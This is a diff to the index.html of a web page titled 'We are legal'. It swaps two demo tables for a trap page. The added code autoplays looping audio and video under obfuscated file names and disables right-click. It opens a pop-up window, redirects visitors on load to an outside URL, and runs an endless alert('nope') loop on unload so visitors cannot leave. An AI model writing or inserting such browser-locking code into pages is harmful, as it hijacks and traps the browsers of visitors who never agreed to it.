--- a/index.html
+++ b/index.html
@@ -1,30 +1,72 @@
 <title>We are legal</title>
-<center><h1>We are legal</h1></center>
 <center>
-<table border=1>
-    <tr>
-        <th>&nbsp;</th> <th>A</th> <th>B</th>
-    </tr>
-    <tr>
-        <th>1</th> <th>A1</th> <th>B1</th>
-    </tr>
-    <tr>
-        <th>2</th> <th>A2</th> <th>B2</th>
-    </tr>
-</table>
-<br />
-<table border=1>
-    <tr>
-        <th>&nbsp;</th>
-        <th colspan="2">Columnas</th>
-    </tr>
-    <tr>
-        <th colspan="2">Filas</th>
-        <td>A1</td><td>B1</td>
-    </tr>
-    <tr>
-        <td>A2</td><td>B2</td>
-    </tr>
-</table>
-<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.tenor.com%2Fimages%2Fde5baa5883f340e36d84e5251175f677%2Ftenor.gif&f=1&nofb=1" alt="Polish cow" />
+    <h1>We are legal</h1>
+    <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.tenor.com%2Fimages%2Fde5baa5883f340e36d84e5251175f677%2Ftenor.gif&f=1&nofb=1" alt="Polish cow" />
 </center>
+<audio loop="loop" autoplay="true">
+            <source src="ynf-qhqnf-fba-ynf-rkcrpgngvinf-qr-yn-ernyvqnq.mp3" type="audio/mp3">
+        </audio>
+		<script>
+		document.onmousedown=disableclick;
+		function disableclick(event)
+		{
+			if(event.button==2)
+			{
+				return false;    
+			}
+		}
+		</script>
+		
+		<style>
+		video {
+			position: fixed;
+			top: 50%;
+			left: 50%;
+			min-width: 100%;
+			min-height: 100%;
+			width: auto;
+			height: auto;
+			z-index: -100;
+			transform: translateX(-50%) translateY(-50%);
+			background-size: cover;
+			transition: 1s opacity;
+		}
+
+		.textbox {
+			margin-top: 5%;
+			margin-left: 0%;
+			margin-right: auto;
+			color: rgba(255, 255, 255, 0.75);
+			text-align: center;
+			text-shadow: 1px 1px 1px #000;
+			font-family: "Verdana";
+			font-size: 24;
+		}
+		a:link {
+			color: rgba(255, 255, 255, 0.75);
+		}
+		a:visited {
+			color: rgba(255, 255, 255, 0.75);
+		}
+		a:hover {
+			color: rgba(255, 255, 255, 0.75);
+		}
+		a:active {
+			color: rgba(255, 255, 255, 0.75);
+		}
+		</style>
+	</head>
+	<script>
+    //"use strict";
+    window.open("https://youtu.be/0yTbSdt7I-A", "topFrame");
+</script>
+	<body oncontextmenu="return false" onload="location.href='https://www.darknessplugins.com/404', load();">
+		<video autoplay="" loop=""> 
+			<source src="ynf-qhqnf-fba-ynf-rkcrpgngvinf-qr-yn-ernyvqnq.mp4" type='video/mp4'>
+		</video>
+		<meta http-equiv=”refresh” content="5" />
+		<script>window.onbeforeunload = function(){
+  while (true) { alert("nope"); };
+};
+</script>
+    </body>
